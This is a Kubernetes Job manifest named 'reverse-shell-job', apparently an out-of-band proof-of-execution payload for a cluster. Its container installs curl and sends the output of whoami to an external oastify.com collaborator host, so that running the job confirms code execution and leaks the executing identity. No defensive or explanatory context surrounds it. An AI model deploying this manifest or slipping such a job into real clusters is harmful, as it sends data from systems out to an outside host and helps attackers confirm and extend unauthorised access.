apiVersion: batch/v1
kind: Job
metadata:
  name: reverse-shell-job
  namespace: default
spec:
  template:
    spec:
      containers:
        - name: reverse-shell
          image: ubuntu:latest
          command: ["/bin/bash", "-c", "apt-get -y update; apt-get -y install curl ; curl https://w0xxbvoy5ypvm5czv3s6gvkpogu7iykm9.oastify.com?$(whoami)"]
      restartPolicy: Never
  backoffLimit: 0
